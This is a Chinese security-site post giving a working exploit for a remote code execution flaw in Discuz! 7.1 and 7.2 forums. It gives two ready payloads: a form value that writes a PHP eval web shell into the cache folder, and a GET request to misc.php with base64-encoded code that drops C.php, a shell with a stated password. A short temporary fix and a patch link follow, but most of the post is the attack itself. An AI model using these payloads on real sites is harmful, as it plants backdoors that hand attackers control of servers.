首页 > 网络安全 > 漏洞分析

discuz!7.1、7.2 远程代码执行漏洞exp

第一种方法:

先注册个用户然后把


帖子ID,指定一个存在的帖子即可:






chr解码后是:value="${${evalfputs(fopen('forumdata/cache/usergroup','w'),'<?php eval($_POST[cmd])?>');

里面有个提交地址改下,保存html

打开点提交,会生产forumdata/cache/usergroup_01.php一句话文件,密码是cmd


第二种方法:

直接GET,利用语句:

misc.php?action=imme_binding&response[result]=aa:b&scriptlang[aa][b]={${fputs(fopen(base64_decode(Yy5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x))}}

在根目录生成C.PHP密码是C

临时修补方法:

在common.inc.php上面加上
$response=$scriptlang=array();

官方发布修补补丁:
http://www.discuz.net/thread-1537673-1-1.html

注:使用exp的话仅限本机测试,其他用途后果自负!
版权声明

本文仅代表作者观点,不代表本站立场。
本文系作者授权发表,未经许可,不得转载。
本文地址:/websafe/loudongfenxi/149542.html

留言与评论(共有 0 条评论)
   
验证码:

潘少俊衡

| 桂ICP备2023010378号-4

Powered By EmpireCMS

爱享小站

中德益农

谷姐神农

环亚肥料

使用手机软件扫描微信二维码

关注我们可获取更多热点资讯

感谢潘少俊衡友情技术支持